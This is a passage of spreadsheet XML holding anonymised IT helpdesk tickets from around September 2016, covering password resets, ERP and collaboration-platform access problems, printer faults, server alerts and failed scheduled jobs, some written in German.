    <s v="_x000a__x000a_received from: gkzedilm.tkpfumeb@gmail.com_x000a__x000a_user gkzedilm tkpfumeb [jesjnlyenm] can't log into his aplications - engineering_tool and netweaver._x000a_netweaver reports &quot;too many incorrect logins&quot; and engineering_engineering_tools &quot;unable to contact server&quot;._x000a_i suspect the user is blocked from these accounts due to too many incorrect logins._x000a_the user did not recently changed password._x000a_"/>
    <s v="bixvmnar glakoprc"/>
    <x v="12"/>
  </r>
  <r>
    <s v="telefon defekt "/>
    <s v="gigaset m2 mit der durchwahl 479_x000d__x000a_akku hÃ¤lt nicht mehr lÃ¤nger wie 1 tag_x000d__x000a_kann am display nicht mehr erkennen._x000d__x000a_clip defekt"/>
    <s v="ptvdxwla tlevwmzo"/>
    <x v="32"/>
  </r>
  <r>
    <s v="unable to log in to erp "/>
    <s v="unable to log in to erp"/>
    <s v="uerghtyi erzatqpy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="user jeshyensky can't log into accounts"/>
    <s v="_x000a__x000a_received from: gkzedilm.tkpfumeb@gmail.com_x000a__x000a_user gkzedilm tkpfumeb [jesjnlyenm] can't log into his aplications - engineering_tool and netweaver._x000a_netweaver reports &quot;too many incorrect logins&quot; and engineering_engineering_tools &quot;unable to contact server&quot;._x000a_i suspect the user is blocked from these accounts due to too many incorrect logins._x000a_the user did not recently changed password._x000a_"/>
    <s v="gkzedilm tkpfumeb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="password reset for mii"/>
    <s v="password reset for mii_x000d__x000a_"/>
    <s v="mktwyzhx zhcenpvt"/>
    <x v="0"/>
  </r>
  <r>
    <s v="my phone #, erp, &quot;name or password is incorrect (repeat logon)&quot;, cannot log into erp systems."/>
    <s v="i have access to a few systems on erp but i am not able to log into the system. i have entered &quot;wynhtydf&quot; as my username and for the password i enter the same password that successfully logs me into password_management_tool password manager. i have unlocked the systems which i have access to in password_management_tool password manager and still cannot log in.  please see screenshot &quot;erp error screenshot&quot; for the error message and &quot;password_management_tool password unlock&quot; for list of erp systems i cannot access."/>
    <s v="wvaksnpy vnixhytj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="sfb : personal certificate error "/>
    <s v="sfb : personal certificate error "/>
    <s v="eziswfym cehwzojy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="my password is locked when i am trying to go into the erp newweaver portal."/>
    <s v="name:nmpworvu upgtrvnj_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:nmpworvu.upgtrvnj@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:my password is locked when i am trying to go into the erp newweaver portal."/>
    <s v="nmpworvu upgtrvnj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to log in to mii"/>
    <s v="unable to log in to mii"/>
    <s v="dxgplzyt jutksefr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="loading esprit cam software on laptop...."/>
    <s v="_x000d__x000a__x000d__x000a_received from: jvshydix.rzpmnylt@gmail.com_x000d__x000a__x000d__x000a_twimc_x000d__x000a__x000d__x000a_i have the opportstorage_product, along with ruben castro of company, to receive free downloads of esprit cam software through a local authorized esprit dealer we are teaming with on a project locally. i was wondering what we needed to do in order to receive administrative approval? "/>
    <s v="jvshydix rzpmnylt"/>
    <x v="2"/>
  </r>
  <r>
    <s v="cannot connect to outlook from home"/>
    <s v="cannot connect to outlook from home"/>
    <s v="fecdszvm ovtsxqnl"/>
    <x v="2"/>
  </r>
  <r>
    <s v="prpf instead of prir"/>
    <s v="for usa location and order 226033677, operation 10_x000d__x000a__x000d__x000a_mii showed the order in prpf status, looking at erp, order was partially confirmed followed by &quot;automatic pause&quot;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
    <s v="entuakhp xrnhtdmk"/>
    <x v="40"/>
  </r>
  <r>
    <s v="qipzctgs wjhtbpfr - need network account so he can get email and etime"/>
    <s v="qipzctgs wjhtbpfr is onsite in usa at baker. he needs to have access to use etime and email. i'm told he needs a network account so we can get all this et up. this is urgent. need by 9/26/16"/>
    <s v="uazkjifp dhtnevcq"/>
    <x v="2"/>
  </r>
  <r>
    <s v="i cannot access the discount tool"/>
    <s v="when trying to enter a discount i get the following message:_x000d__x000a__x000d__x000a_error occured.  contact pricing_x000d__x000a__x000d__x000a_i have a new laptop.  i don't think it has been configured yet."/>
    <s v="nbcyhjxg czawdryt"/>
    <x v="0"/>
  </r>
  <r>
    <s v="confirm threshold qty"/>
    <s v="if i set confirm qty threshold to 100, it gives me error even when i try to confirm order planned qty (default). _x000d__x000a_for example - if order is 20 pieces and confirmation screen by default shows 20 pieces, it will give me a warning if threshold is set to 100. i believe i should get this warning for confirming pieces higher than threshold. (threshold should check if pieces entered are equal or less than planned =&gt; no warning)"/>
    <s v="entuakhp xrnhtdmk"/>
    <x v="40"/>
  </r>
  <r>
    <s v="performance improvement/tuning  "/>
    <s v="performance improvement/tuning for machine summary &amp; load list_x000d__x000a_"/>
    <s v="entuakhp xrnhtdmk"/>
    <x v="40"/>
  </r>
  <r>
    <s v="erp SID_34 login issue - terhyury portelance "/>
    <s v="name:chhyene dolhyt_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:ianqdhmu.camoysfq@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:i am currently on the phone with our salesman terhyury portelance and he needs his password reset in erp.  can you help.  his user id is porteta"/>
    <s v="ianqdhmu camoysfq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="vmsliazh ltksxmyv causing high cpu utilization on server HostName_341"/>
    <s v="we've noticed that the cpu utilization on the mii uacyltoe hxgaycze server, HostName_341, has been hovering around 50% - 70% with occasional spikes to 100%.  we have stopped all of the background jobs and even rebooted the server but the utilization is still very high.   attached is a screen shot of the task manager processes showing the sql process.   is there anything that you can check on this server to see what is consuming so much of the system resources?   there are only a few users who are currently using the uacyltoe hxgaycze system at this time"/>
    <s v="dctvfjrn oypnxftq"/>
    <x v="1"/>
  </r>
  <r>
    <s v="outlook addin : crm not showing up."/>
    <s v="outlook addin : crm not showing up."/>
    <s v="pojhkxua frpxtsca"/>
    <x v="0"/>
  </r>
  <r>
    <s v="need acces to erp"/>
    <s v="_x000a__x000a_received from: umdyvbxo.qwzstijr@gmail.com_x000a__x000a_hello,_x000a__x000a_1. erp user id having issue: rudras_x000a_2. erp system (SID_34, SID_37,..., SID_1,...SID_21,..., SID_51, portal): SID_34_x000a_3. error screenshot:_x000a_i am unable to open few transaction codes,_x000a_and few codes will not allow me to change anything in the material._x000a_[cid:image001.png@01SID_35348.7dfea860]_x000a_4. su53 screenshot:_x000a_[cid:image004.png@01SID_35349.1758c680]_x000a_5. business justification: i am working for usa and will do the same work as schtrtgoyht (schhdgtmips)._x000a_6. reference / mirror user id with same job title having access to it: schhdgtmips_x000a__x000a_"/>
    <s v="umdyvbxo qwzstijr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to print expense report"/>
    <s v="unable to print expense report"/>
    <s v="csmhykge mpxbjudw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="password reset"/>
    <s v="from: microsoft on behalf of company inc. [mailto:msonlineservicesteam@microsoftonline.com] _x000a_sent: tuesday, september 20, 2016 6:58 pm_x000a_to: nwfodmhc exurcwkm_x000a_cc: tiyhum kuyiomar_x000a_subject: amar - request to reset microsoft online services password for goyvcped.sxbgiajh@gmail.com_x000a_importance: high_x000a__x000a_    request to reset user's password   _x000a_   the following user in your organization has requested a password reset be performed for their account: _x000a__x000a_â€¢ goyvcped.sxbgiajh@gmail.com _x000a_â€¢ first name: michbhuael _x000a_â€¢ last name: laugdghjhlin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goyvcped sxbgiajh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="can not create delivery for sto 4908059474"/>
    <s v="i had company south_amerirtca look at the sto and someone at our facility and nobody is able to help me. "/>
    <s v="knabwtox ksbzjdrn"/>
    <x v="5"/>
  </r>
  <r>
    <s v="create co object for aacount 81469651- plant_248 to do gr - delivery 9168437599- sto 4907248786"/>
    <s v="is not possible to do gr for delivery 9168437599 - sto 5018359897_x000d__x000a_error below _x000d__x000a_ account 81469651 requires an assignment to a co object_x000d__x000a_message no. ki235_x000d__x000a__x000d__x000a_diagnosis_x000d__x000a_you have not defined a co account assignment for an account that is relevant to cost accounting._x000d__x000a__x000d__x000a_system response_x000d__x000a_account 81469651 is defined as a cost element._x000d__x000a_this means that you must always specify a co account assignment._x000d__x000a__x000d__x000a_procedure_x000d__x000a_enter one of the following co account assignments_x000d__x000a__x000d__x000a_order_x000d__x000a_cost center / cost center/ activity type_x000d__x000a_sales order item (for a project or cost relevant)_x000d__x000a_project / wbs element_x000d__x000a_cost object (process manufacturing)_x000d__x000a_network/ network activities_x000d__x000a_business process_x000d__x000a_profitability segment_x000d__x000a_real estate object_x000d__x000a_the posting row affected is 1111111112, account 81469651_x000d__x000a_"/>
    <s v="jaeuqbvt orlhenfj"/>
    <x v="9"/>
  </r>
  <r>
    <s v="application &quot;hana sidecar prod&quot; on node &quot;HostName_1297&quot; is in a warning state. cpu load is high for that service. "/>
    <s v="application &quot;hana sidecar prod&quot; on node &quot;HostName_1297&quot; is in a warning state. cpu load is high for that service. "/>
    <s v="rkupnshb gsmzfojw"/>
    <x v="13"/>
  </r>
  <r>
    <s v="account unlock"/>
    <s v="account unlock"/>
    <s v="opzuciql muedfkhz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="vip 2 // erp SID_21 account unlock for user vvshyuwb1"/>
    <s v="vip 2 // erp SID_21 account unlock for user vvshyuwb1_x000a__x000a__x000a_from: stefyty parkeyhrt _x000a_sent: tuesday, september 20, 2016 9:31 pm_x000a_to: nwfodmhc exurcwkm_x000a_subject: amar fw: need unlock my userid: vvshyuwb1_x000a_importance: high_x000a__x000a_please assist user aerp. he is a consultant on a project._x000a__x000a_"/>
    <s v="esntuago kwxrdhuv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="vip 2 // unable to access collaboration_platform"/>
    <s v="_x000a_name:brandhyht s muthdyrta_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:zanivrec.capbfhur@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:collaboration_platform problem - when i try to access _x000a__x000a_error_x000a__x000a_the server is busy now. try again later_x000a_correlation id::1e9da59d-50a2-3000-1604-10e20332f108_x000a__x000a_date and time: 9/20/2016 5:49:42 am_x000a_"/>
    <s v="zanivrec capbfhur"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to access collaboration_platform"/>
    <s v="unable to access collaboration_platform"/>
    <s v="tuyasvzc zmhorudq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="customer master can not be changed."/>
    <s v="hello_x000d__x000a__x000d__x000a_customer â„–81851756_x000d__x000a_it changed, but the data is not updated._x000d__x000a__x000d__x000a_from the registration of the ship to only, it has registered a sold to like._x000d__x000a_"/>
    <s v="uxndyfrs vahxnfgl"/>
    <x v="14"/>
  </r>
  <r>
    <s v="missing  ewa reports for SID_51."/>
    <s v="i have not received the SID_51 ewa reports for 09/13 and  09/20.  please fix."/>
    <s v="drmusvny yvsmtgid"/>
    <x v="13"/>
  </r>
  <r>
    <s v="vip 2 // unable to access collaboration_platform"/>
    <s v="vip 2 // unable to access collaboration_platform"/>
    <s v="ztnpeshl vmdyglqn"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to access collaboration_platform"/>
    <s v="unable to access collaboration_platform"/>
    <s v="qcwoejsk cowdbfkn"/>
    <x v="0"/>
  </r>
  <r>
    <s v="please provide vpn access to ngfedxrp oirmgqcs, hodgek, approved by phjencfg kwtcyazx and andhtyju volkhd"/>
    <s v="pc is job_scheduler owned, company imaged laptop, pc name is job_schedulerbhml70001"/>
    <s v="zcdirjeq azokfsdi"/>
    <x v="33"/>
  </r>
  <r>
    <s v="error while qualify a new leadin  ms dynamics crm"/>
    <s v="hi,_x000d__x000a_i was working in crm and tried to qualify a new lead. when i did i got the below error. please advise._x000d__x000a__x000d__x000a_"/>
    <s v="vkzwafuh tcjnuswg"/>
    <x v="39"/>
  </r>
  <r>
    <s v="job Job_1394 failed in job_scheduler at: 09/20/2016 10:55:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1394 failed in job_scheduler at: 09/20/2016 10:55:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="unable to click on claims page of insurance website"/>
    <s v="unable to click on claims page of insurance website"/>
    <s v="ahuztyxg zlrwshfb"/>
    <x v="0"/>
  </r>
  <r>
    <s v=" unable to find any po pending with me"/>
    <s v="hello,_x000d__x000a__x000d__x000a_am unable to find any po pending with me. pl find screen shot, upon going thro' SID_34._x000d__x000a_kindly do the needfufl._x000d__x000a_"/>
    <s v="jmfvwrek pqwehmzg"/>
    <x v="29"/>
  </r>
  <r>
    <s v="password reset - erp"/>
    <s v="from: sanmhty mahatndhyua _x000a_sent: tuesday, september 20, 2016 12:21 pm_x000a_to: nwfodmhc exurcwkm &lt;nwfodmhc.exurcwkm@gmail.com&gt;_x000a_subject: sonia - fw: reminder for approval of requisition 49001312_x000a__x000a_hi,_x000a__x000a_please reset erp password as i do not use regularly and have to clear below mentioned pr urgently._x000a__x000a__x000a_"/>
    <s v="slfxjznk hmspexor"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to login to vcenter HostName_795"/>
    <s v="unable to login to vcenter HostName_795."/>
    <s v="zgemhkby lgwkstcb"/>
    <x v="11"/>
  </r>
  <r>
    <s v="job kk_uacyltoe hxgaycze failed in job_scheduler at: 09/20/2016 10:15:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job kk_uacyltoe hxgaycze failed in job_scheduler at: 09/20/2016 10:15:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="4"/>
  </r>
  <r>
    <s v="discount form"/>
    <s v="_x000d__x000a__x000d__x000a_received from: sqlcuhep.railgnfb@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_i am not able to use the discount request form. following window opens once i click new request. please help!_x000d__x000a__x000d__x000a_[cid:image001.jpg@01SID_35326.c4793b10]_x000d__x000a__x000d__x000a__x000d__x000a_best "/>
    <s v="sqlcuhep railgnfb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="replication error : domain controller HostName_752"/>
    <s v="we see event ld 1127, 1084 and 2108. which is related to dc replication issue. hence will have to reboot the server."/>
    <s v="rutkswpn fouwyqma"/>
    <x v="38"/>
  </r>
  <r>
    <s v="zredeploy created sto has future committed date"/>
    <s v="sto created by zredeploy has future committed date in it even when stock are available at the sender warehouse. "/>
    <s v="kaguhxwo uoyipxqg"/>
    <x v="5"/>
  </r>
  <r>
    <s v="require new driver for local printer."/>
    <s v="require new driver for local printer."/>
    <s v="sidyuncg ptvogsxa"/>
    <x v="0"/>
  </r>
  <r>
    <s v="am not able to save a spreadsheet into team documents"/>
    <s v="need to be able to save several times a day into team documents - can't attach screenshot   - "/>
    <s v="wvqgbdhm fwchqjor"/>
    <x v="15"/>
  </r>
  <r>
    <s v="screenshot"/>
    <s v="_x000a__x000a_received from: gbirhjat.fptbrhwv@gmail.com_x000a__x000a_please look at this this error message and let me know how to fix it._x000a__x000a_[cid:image001.jpg@01SID_35324.a628ae40]_x000a__x000a_marjnstyk r jsytis_x000a_senior sales engineer_x000a_gbirhjat.fptbrhwv@gmail.com_x000a__x000a__x000a_[company_horz_logo]_x000a__x000a__x000a__x000a__x000a__x000a_"/>
    <s v="gbirhjat fptbrhwv"/>
    <x v="39"/>
  </r>
  <r>
    <s v="archiving_tool server - optical archive documents"/>
    <s v="_x000d__x000a__x000d__x000a_received from: seltxfkw.ontgxqwy@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_our local application can't  download files from archiving_tool server because the content repository address is not returning a valid response._x000d__x000a_archiving_tool addreess we are tring to call is:_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_and we obtain the following answer:_x000d__x000a__x000d__x000a__x000d__x000a_http status 404 - /procache/cscache_x000d__x000a__x000d__x000a_--------------------------------------------------------------------------------_x000d__x000a__x000d__x000a_type status report_x000d__x000a__x000d__x000a_message /procache/cscache_x000d__x000a__x000d__x000a_description the requested resource is not available._x000d__x000a__x000d__x000a_i kindly ask you to check web service configuration to enable comunication on 8080 port._x000d__x000a_trying to ping archiving_tool-app the address is solved as  10.2.9.149._x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="seltxfkw ontgxqwy"/>
    <x v="46"/>
  </r>
  <r>
    <s v="erp SID_34 password reset"/>
    <s v="name:mfeyouli ndobtzpw_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:mfeyouli.ndobtzpw@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:please reset SID_34 erp account for haunm"/>
    <s v="mfeyouli ndobtzpw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_2063b failed in job_scheduler at: 09/20/2016 09:37:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_2063b failed in job_scheduler at: 09/20/2016 09:37:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="5"/>
  </r>
  <r>
    <s v="outlook does not open"/>
    <s v="outlook does not open"/>
    <s v="ciszbkoh xozqjavr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="the shop_floor_app is reporting a : down status on, lcosm005. please investigate"/>
    <s v="observing alert in monitoring_tool since 09:04 am on 09/20 et:_x000d__x000a_the shop_floor_app is reporting a : down status on, lcosm005. we are able to ping the server._x000d__x000a__x000d__x000a_c:\users\karansb&gt;ping lcosm005_x000d__x000a__x000d__x000a_pinging lcosm005.company.company.com [57.68.38.7412] with 32 bytes of data:_x000d__x000a_reply from 57.68.38.7412: bytes=32 time=230ms ttl=124_x000d__x000a_reply from 57.68.38.7412: bytes=32 time=230ms ttl=124_x000d__x000a_reply from 57.68.38.7412: bytes=32 time=230ms ttl=124_x000d__x000a_reply from 57.68.38.7412: bytes=32 time=230ms ttl=124_x000d__x000a__x000d__x000a_ping statistics for 57.68.38.7412:_x000d__x000a_    packets: sent = 4, received = 4, lost = 0 (0% loss),_x000d__x000a_approximate round trip times in milli-seconds:_x000d__x000a_    minimum = 230ms, maximum = 230ms, average = 230ms_x000d__x000a__x000d__x000a_c:\users\karansb&gt;_x000d__x000a__x000d__x000a_"/>
    <s v="jloygrwh acvztedi"/>
    <x v="11"/>
  </r>
  <r>
    <s v="clients laptop crashed and will not boot"/>
    <s v="clients laptop crashed and will not boot"/>
    <s v="onvpjxei uiolhpjq"/>
    <x v="2"/>
  </r>
  <r>
    <s v="account locked"/>
    <s v="account locked"/>
    <s v="bjtguqne xthqrzpc"/>
    <x v="0"/>
  </r>
  <r>
    <s v="in plant_228 EU_tool is not working since friday"/>
    <s v="we are already in contact with the EU_tool-system in india. we need each imaginal help. since friday 09-20-2016 we have big problems with EU_tool since friday 09-20-2016.  today EU_tool we have no chance to confirm our operations, to sign our errors,  to set our stockmanagement etc. this is a very great hinderance for plant_228. "/>
    <s v="zcokibmd xnrthsmj"/>
    <x v="25"/>
  </r>
  <r>
    <s v="replace monitor in cell 3 with one that tiyhum kuyiomar sent."/>
    <s v="replace monitor in cell 3 with one that tiyhum kuyiomar sent."/>
    <s v="goaxzsql qpjnbgsa"/>
    <x v="2"/>
  </r>
  <r>
    <s v="vip 2: collaboration_platform access problem"/>
    <s v="_x000a__x000a_received from: kzbuhixt.zjdmoahr@gmail.com_x000a__x000a_i'm not able to log into collaboration_platform or collaboration_platform.  i have restarted my pc multiple times and tried to log in but cannot do so.  please advise!  see screen shots below.  -_x000a__x000a_[cid:image001.png@01SID_3531f.1b49eff0]_x000a__x000a_[cid:image002.png@01SID_3531f.1b49eff0]_x000a__x000a_sethdyr hdtyr_x000a_assistant general counsel â€“ compliance and real estate_x000a__x000a_kzbuhixt.zjdmoahr@gmail.com&lt;mailto:kzbuhixt.zjdmoahr@gmail.com&gt;_x000a__x000a_"/>
    <s v="kzbuhixt zjdmoahr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="collaboration_platform"/>
    <s v="_x000a__x000a_received from: rxqtvanc.kthqwxvb@gmail.com_x000a__x000a_company collaboration_platform is down.  cannot access the hub.  keep getting this message._x000a__x000a_[cid:image001.png@01SID_3531e.f83adec0]_x000a__x000a_rxqtvanc kthqwxvb_x000a_region controller - amerirtcas_x000a_email: rxqtvanc.kthqwxvb@gmail.com&lt;mailto:rxqtvanc.kthqwxvb@gmail.com&gt;_x000a__x000a__x000a_"/>
    <s v="rxqtvanc kthqwxvb"/>
    <x v="15"/>
  </r>
  <r>
    <s v="replace monitor across from yolktfas fyoxqgvh. a different cable is needed."/>
    <s v="replace monitor across from yolktfas fyoxqgvh. a different cable is needed."/>
    <s v="goaxzsql qpjnbgsa"/>
    <x v="2"/>
  </r>
  <r>
    <s v="i can not access the company collaboration_platform server in usa."/>
    <s v="i get an error message indicating &quot;the server is busy right now. try again later&quot;.  please see the attachment to review the message.  if you need additional information, i can be reached at ("/>
    <s v="yswgzvrc frjzcnsu"/>
    <x v="0"/>
  </r>
  <r>
    <s v="vip2: the hub / collaboration_platform is down"/>
    <s v="_x000a__x000a_received from: lpoebzsc.grknswyo@gmail.com_x000a__x000a_i am unable to access the hub, collaboration_platform, and collaboration_platform.  i receive the below error._x000a__x000a_[cid:image001.png@01SID_3531e.66b94450]_x000a__x000a_best,_x000a__x000a_lpoebzsc grknswyo_x000a_executive assistant tofinance_vip1,_x000a_     vice president and chief financial officer_x000a_lpoebzsc.grknswyo@gmail.com&lt;mailto:lpoebzsc.grknswyo@gmail.com&gt;_x000a__x000a__x000a__x000a__x000a_"/>
    <s v="lpoebzsc grknswyo"/>
    <x v="0"/>
  </r>
  <r>
    <s v="cursors moving in the opposite direction."/>
    <s v="cursors moving in the opposite direction._x000d__x000a__x000d__x000a_"/>
    <s v="tfbpzgcr ztqkbuic"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp SID_34 account locked."/>
    <s v="erp SID_34 account locked. "/>
    <s v="hzetqwba tmsbnfkh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp password reset for user : lombab&lt;vrcqhnty ajomhkfv&gt;"/>
    <s v="_x000a_summary:operator does not know their mii erp username or password"/>
    <s v="pxwhlnse hjfzvsoa"/>
    <x v="0"/>
  </r>
  <r>
    <s v="inc1552016 - ticket update"/>
    <s v="inc1552016 - ticket update"/>
    <s v="olckhmvx pcqobjnd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="server is busy on collaboration_platform"/>
    <s v="server is busy on collaboration_platform"/>
    <s v="ethwnzfb roqytnjk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="2 active content versions"/>
    <s v="we can't open and save 71844588 nxa as there are two epj active content versions._x000d__x000a__x000d__x000a_i've tried using /dscsag/dms_kpro_double_repair without success._x000d__x000a__x000d__x000a_according to bob ...&quot;there is a report in erp called rsir_content_unmarkhty_prelim that should resolve the issue with multiple active content versions&quot;"/>
    <s v="ctvaejbo mjcerqwo"/>
    <x v="10"/>
  </r>
  <r>
    <s v="vip 2 printer drivers not installing"/>
    <s v="unsuccessful installing drivers for network printers (tc48 &amp; tc19); attempts result in &quot;error processing request.&quot;"/>
    <s v="recjqtbg xcyuetmj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="company.collaboration_platform.com : application status is down from 8:47 am et 09/20."/>
    <s v="company.collaboration_platform.com : application status is down from 8:47 am et 09/20."/>
    <s v="rkupnshb gsmzfojw"/>
    <x v="15"/>
  </r>
  <r>
    <s v="drucker em95 defekt"/>
    <s v="drucker em95 druckt nicht mehr irgend ein fehler im papiereinzug nach anweisung fehlermeldung nachgeschaut und nichts gefunden?"/>
    <s v="wyotidgu nydzrtuw"/>
    <x v="41"/>
  </r>
  <r>
    <s v="error message and different views"/>
    <s v="during working on crm i' m  getting exit pop-ups - i attached screens"/>
    <s v="lmsxcvoz vzhkdpfn"/>
    <x v="14"/>
  </r>
  <r>
    <s v="wk25 erp drucker druckt nicht sauber. seiten wedgrtyh ahsnwtey."/>
    <s v="wk25 erp drucker druckt nicht sauber. seiten wedgrtyh ahsnwtey."/>
    <s v="jcgzqndm hukibzqa"/>
    <x v="32"/>
  </r>
  <r>
    <s v="vip 2 // unable to sign in to one note as password is not synching"/>
    <s v="vip 2 // unable to sign in to one note as password is not synching"/>
    <s v="ihozauxs ohdqmipz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="account auf iphone lÃ¶schen und neu anlegen."/>
    <s v="da durch den zugriff per iphone auf den mail account das gesamte konto gesperrt wurde, _x000d__x000a_muss der account auf dem iphone gelÃ¶scht und neu anlegt werden."/>
    <s v="jxphgfmb gjbtuwek"/>
    <x v="24"/>
  </r>
  <r>
    <s v="passwort muÃŸ nochmals zurÃ¼ckgestzt werden."/>
    <s v="vermutlich hat der zugriff mit dem iphone das konto wieder gesperrt._x000d__x000a_passwort muÃŸ nochmals zurÃ¼ckgestzt werden. /jxphgfmb gjbtuwek"/>
    <s v="jxphgfmb gjbtuwek"/>
    <x v="24"/>
  </r>
  <r>
    <s v="erp SID_34 password reset request "/>
    <s v="erp SID_34 password reset request "/>
    <s v="xgasvhed hesuolmf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="user is unable to open presentation from outlook client."/>
    <s v="user is unable to open presentation from outlook client."/>
    <s v="enhjdypo rsbxiepn"/>
    <x v="18"/>
  </r>
  <r>
    <s v="archive emails"/>
    <s v="old e-mails - they have been archived somewhere? i need to access - how do i get there?"/>
    <s v="fgljepar xpsarwiz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="inc1552901: packet drops in india -1111460708"/>
    <s v="_x000a__x000a_received from: mnlazfsr.mtqrkhnx@gmail.com_x000a__x000a_from: ramdntythanjeshkurtyar  [mailto:radjkanjesh.sidrthy@telecom_vendor_1corp.com]_x000a_sent: tuesday, september 20, 2016 6:06 am_x000a_to: spxqmiry zpwgoqju; sadjuetha shwyhdtu_x000a_cc: datacenter; network; sot.south@telecom_vendor_1corp.com_x000a_subject: re: packet drops _x000a__x000a_dear vignbhyesh,_x000a__x000a_we are experiencing internal fiber media issue outage._x000a__x000a_team is working on for restoration. etr is 4.30 pm._x000a__x000a__x000a_warm "/>
    <s v="mnlazfsr mtqrkhnx"/>
    <x v="7"/>
  </r>
  <r>
    <s v="windows update kb4283716 makes logon the telephony_software imposible ( do not assign to telephony_software admins)"/>
    <s v="when users delete the update, it will run the update every day. the update makes it impossible to logon to the telephony_software phone system._x000d__x000a_therefor we need to have a easy way to remove the update or avoid the update to be installed._x000d__x000a__x000d__x000a_this is a global issue although mostly seen within europe._x000d__x000a__x000d__x000a_"/>
    <s v="urvitans laqdwvgo"/>
    <x v="65"/>
  </r>
  <r>
    <s v="engineering tool related issue"/>
    <s v="_x000d__x000a__x000d__x000a_received from: zdgxtfqs.tibmhxcs@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a_please refer the below screen shot for engineering tool related issue._x000d__x000a_after installing software update, i am unable make new customer entries. please note that option button for new customer entry  is not appearing._x000d__x000a__x000d__x000a_kindly resolve the problem at the earliest._x000d__x000a__x000d__x000a_[cid:image001.jpg@01SID_35364.8a8deca0]_x000d__x000a__x000d__x000a_best "/>
    <s v="zdgxtfqs tibmhxcs"/>
    <x v="25"/>
  </r>
  <r>
    <s v="one note issue"/>
    <s v="_x000d__x000a__x000d__x000a_received from: lhejbwkc.xbmyvnqf@gmail.com_x000d__x000a__x000d__x000a_hi_x000d__x000a__x000d__x000a_when a one note workbook is shared with me i can only open the web view and get below error message:_x000d__x000a__x000d__x000a_[cid:image001.png@01SID_35346.ecc0c320]_x000d__x000a__x000d__x000a_according to the owner i have permission to open it._x000d__x000a__x000d__x000a_"/>
    <s v="lhejbwkc xbmyvnqf"/>
    <x v="15"/>
  </r>
  <r>
    <s v="problem with hagemeyer oci shop in SID_34 purchasing"/>
    <s v="as discussed_x000d__x000a_"/>
    <s v="rhinvtua aquyjfbs"/>
    <x v="29"/>
  </r>
  <r>
    <s v="cvd  amount wrongly generated"/>
    <s v="_x000d__x000a__x000d__x000a_received from: ikerxqwz.prkyuitl@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_vide below mentioned inwarehouse_tool ,  customer   has returned   material  without excise papers ._x000d__x000a__x000d__x000a_we find  system has debited  cvd amount and  also  credited  expenses ._x000d__x000a__x000d__x000a_please review   and rectify accordingly_x000d__x000a__x000d__x000a__x000d__x000a_[cid:image001.png@01SID_3535e.501961e0]_x000d__x000a__x000d__x000a_"/>
    <s v="ikerxqwz prkyuitl"/>
    <x v="9"/>
  </r>
  <r>
    <s v="reset password in SID_50 - user zigioachstyac"/>
    <s v="reset password in SID_50 - user zigioachstyac"/>
    <s v="jaeuqbvt orlhenfj"/>
    <x v="19"/>
  </r>
  <r>
    <s v="bitte im laufwerk germany unter m:\berechnungsprogramdntym die datei db_stp vom datum 19.09.2016 wiederherstellen."/>
    <s v="bitte im laufwerk germany unter m:\berechnungsprogramdntym die sicherungsdatei db_stp vom datum 19.09.2016 wiederherstellen. benÃ¶tigen wir um produktionsinfos raus zu geben."/>
    <s v="rphoiduv hfbevpir"/>
    <x v="11"/>
  </r>
  <r>
    <s v="not able to build distributor_tool project in local system"/>
    <s v="not able to build distributor_tool project in local system._x000d__x000a_when i login(vvhstyap) with my details, i m not able to build project in my local system. but, when my colleague log's in with his login details, he's able to build the project in my local system_x000d__x000a_so kindly look into this on priority as it is stopping my development activities._x000d__x000a_you can use venktyamk12 login name as a reference to map the roles to me."/>
    <s v="jdocyzgq gdvmjnso"/>
    <x v="19"/>
  </r>
  <r>
    <s v="awb 0276036761 / sin - jnb"/>
